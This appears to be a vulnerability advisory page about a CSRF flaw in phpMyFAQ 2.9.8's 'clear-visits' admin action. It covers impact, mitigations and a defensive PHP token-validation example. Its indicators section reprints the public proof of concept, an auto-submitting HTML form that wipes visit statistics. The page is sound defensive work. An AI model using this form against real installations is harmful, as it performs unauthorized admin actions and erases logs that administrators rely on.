phpMyFAQ 2.9.8 - Cross-Site Request Forgery (CSRF)
AI Analysis
Technical Summary
phpMyFAQ 2.9.8 contains a Cross-Site Request Forgery (CSRF) vulnerability tracked as CVE-2017-15734. It lies in the 'clear-visits' action of the admin interface, handled in the stat.main.php file. The action is triggered by a plain GET request to 'admin/index.php?action=clear-visits' and performs no CSRF token validation or origin check. An attacker can therefore lure an authenticated administrator to a web page that automatically issues that request, and the application clears its visit statistics without any deliberate action by the victim. The victim must be logged in with sufficient permissions to use the 'clear-visits' function. The published exploit is a minimal HTML form with a script that submits it on load, which shows how little effort exploitation takes. Because the application never checks that a state-changing request came from a legitimate source, it violates a basic web application security practice. The impact is limited to clearing visit logs, but that unauthorized action can be used to cover tracks or disrupt monitoring. The source provides no patch links, although the vulnerability is known and documented. The exploit has been tested on Ubuntu and Windows, confirming that it works across platforms. The case underlines the need for CSRF tokens and origin validation on every state-changing operation in a web application.
Potential Impact
For European organizations, the impact primarily involves unauthorized administrative actions that can disrupt monitoring and auditing by clearing visit statistics in phpMyFAQ installations. This could hinder incident response and forensic investigations by removing valuable access logs. While the vulnerability does not allow full system compromise or data exfiltration, it undermines the integrity and availability of monitoring data. Organizations relying on phpMyFAQ for knowledge base and FAQ management may experience reduced visibility into user activity and potential misuse of the system. Attackers could leverage this to conceal malicious activities or disrupt normal operations. The requirement for an authenticated session limits the attack surface but does not eliminate risk, especially in environments where users may be tricked into visiting malicious sites. European public sector entities, educational institutions, and businesses using phpMyFAQ could face operational disruptions and reduced trust in their internal knowledge management systems. The medium severity reflects the moderate impact and exploitation complexity.
Mitigation Recommendations
To mitigate this vulnerability, organizations should immediately update phpMyFAQ to a version that includes CSRF protection for all state-changing actions, including 'clear-visits'. If an official patch is unavailable, administrators should implement custom CSRF token validation in the affected code paths, ensuring that all requests modifying state require a valid token tied to the user session. Additionally, restrict administrative access to trusted networks and enforce strong authentication mechanisms such as multi-factor authentication to reduce the risk of session hijacking. Employ Content Security Policy (CSP) headers and SameSite cookies to limit cross-origin requests. Regularly audit and monitor access logs for unusual activity, especially unexpected clearing of visit statistics. User education on phishing and social engineering risks can reduce the likelihood of users visiting malicious sites that trigger CSRF attacks. Finally, consider isolating the phpMyFAQ admin interface behind VPN or IP whitelisting to further reduce exposure.
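The following is an added example of the custom token validation recommended above, written for this page and not taken from phpMyFAQ itself. It shows a session-bound CSRF token helper, an Origin/Referer check as a second layer, and a hardened handler for a state-changing admin action like 'clear-visits' that only accepts POST requests carrying a valid token. The function names, the csrf_token field name, the $userHasPermission flag and the $clearVisits callback are all assumptions made for the example; phpMyFAQ's real permission and statistics code is not shown here.

```php
<?php
// Added example, not phpMyFAQ code: CSRF token helper plus a hardened handler
// for a state-changing admin action. All names below are assumptions.
declare(strict_types=1);

if (session_status() !== PHP_SESSION_ACTIVE) {
    session_start();
}

// Issue (or reuse) one unpredictable token per session: 32 bytes from the
// CSPRNG, hex-encoded so it can be embedded in a hidden form field.
function csrfToken(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Compare the submitted token with the session copy. hash_equals() runs in
// constant time, so a wrong token does not leak which bytes matched.
function csrfTokenIsValid(?string $submitted): bool
{
    $expected = $_SESSION['csrf_token'] ?? '';
    return $expected !== '' && is_string($submitted) && hash_equals($expected, $submitted);
}

// Hidden input to place in every form that triggers a state change.
function csrfField(): string
{
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrfToken(), ENT_QUOTES, 'UTF-8') . '">';
}

// Defense in depth: accept the request only if the Origin header (or, failing
// that, the Referer) names our own host. Missing both is treated as cross-site.
// $expectedHost is the site's canonical host name without port (assumption).
function requestOriginMatches(string $expectedHost): bool
{
    $source = $_SERVER['HTTP_ORIGIN'] ?? $_SERVER['HTTP_REFERER'] ?? null;
    if ($source === null) {
        return false;
    }
    $host = parse_url($source, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $expectedHost) === 0;
}

// Hardened handler. Returns the HTTP status it set, so callers (and tests) can
// see which check rejected the request. $userHasPermission stands in for the
// application's own authorization check; $clearVisits performs the deletion.
function handleClearVisits(bool $userHasPermission, callable $clearVisits, string $expectedHost): int
{
    // 1. Only accept POST. A GET URL can be triggered by a link, an <img> tag,
    //    a redirect or an auto-submitted form, which is exactly the published PoC.
    if (($_SERVER['REQUEST_METHOD'] ?? 'GET') !== 'POST') {
        http_response_code(405);
        return 405;
    }
    // 2. Require the session-bound token. A page on another origin cannot read
    //    the victim's session or the token embedded in the legitimate form.
    if (!csrfTokenIsValid($_POST['csrf_token'] ?? null)) {
        http_response_code(403);
        return 403;
    }
    // 3. Origin/Referer check as a second, independent layer.
    if (!requestOriginMatches($expectedHost)) {
        http_response_code(403);
        return 403;
    }
    // 4. The authorization check stays; CSRF protection supplements it.
    if (!$userHasPermission) {
        http_response_code(403);
        return 403;
    }
    $clearVisits();
    return 200;
}

// Rendering side: the "clear visits" button becomes a POST form carrying the token.
function renderClearVisitsForm(): string
{
    return '<form method="POST" action="index.php?action=clear-visits">'
        . csrfField()
        . '<button type="submit">Clear visit statistics</button></form>';
}
```

Two points about the design. First, switching the action to POST is not itself the fix; the token is. POST merely removes the trivial triggers (links, image tags, redirects), while a cross-site page can still auto-submit a POST form. Second, SameSite cookies help but do not replace the token here: with SameSite=Lax the session cookie is still sent on a top-level GET navigation, which is precisely how the published proof of concept reaches 'clear-visits'. Only SameSite=Strict, or the token check combined with the move to POST, actually blocks that request.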
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland
Indicators of Compromise
- exploit-code:
  # Exploit Title: phpMyFAQ 2.9.8 - Cross-Site Request Forgery(CSRF)
  # Date: 2024-10-26
  # Exploit Author: CodeSecLab
  # Vendor Homepage: https://github.com/thorsten/phpMyFAQ
  # Software Link: https://github.com/thorsten/phpMyFAQ
  # Version: 2.9.8
  # Tested on: Ubuntu Windows
  # CVE : CVE-2017-15734

  PoC:
  Get http://phpmyfaq/admin/index.php?action=clear-visits

  Reproduction:
  While still logged in, open another browser window to access the link.

  Some Details:
  {
    "Protection Mechanisms Before Patch": "No CSRF token validation was implemented in the 'clear-visits' action within the stat.main.php file, allowing requests to be made without verifying the authenticity of the request origin.",
    "File Navigation Chain": "Public Access Entry URL: http://phpmyfaq/admin/index.php -> Vulnerable File: phpmyfaq/admin/stat.main.php",
    "Execution Path Constraints": "The user must be authenticated and possess the appropriate permissions to access the 'clear-visits' action. The navigation to the vulnerable file relies on the 'action' parameter within the admin index.php file, which must be set to 'clear-visits'.",
    "Request Parameters": "action=clear-visits",
    "Request Method": "GET",
    "Request URL": "http://phpmyfaq/admin/index.php?action=clear-visits",
    "Final PoC": "<html>\n <body>\n <form action=\"http://phpmyfaq/admin/index.php?action=clear-visits\" method=\"GET\">\n <input type=\"submit\" value=\"Submit request\">\n </form>\n <script>\n document.forms[0].submit();\n </script>\n </body>\n</html>"
  }
  [Replace Your Domain Name]
Technical Details
- Edb Id: 52459
- Has Exploit Code: true
- Code Language: text
Threat ID: 69307a4db129615efa16edb5
Added to database: 12/3/2025, 5:58:37 PM
Last enriched: 12/3/2025, 5:58:53 PM
Last updated: 12/4/2025, 11:16:32 AM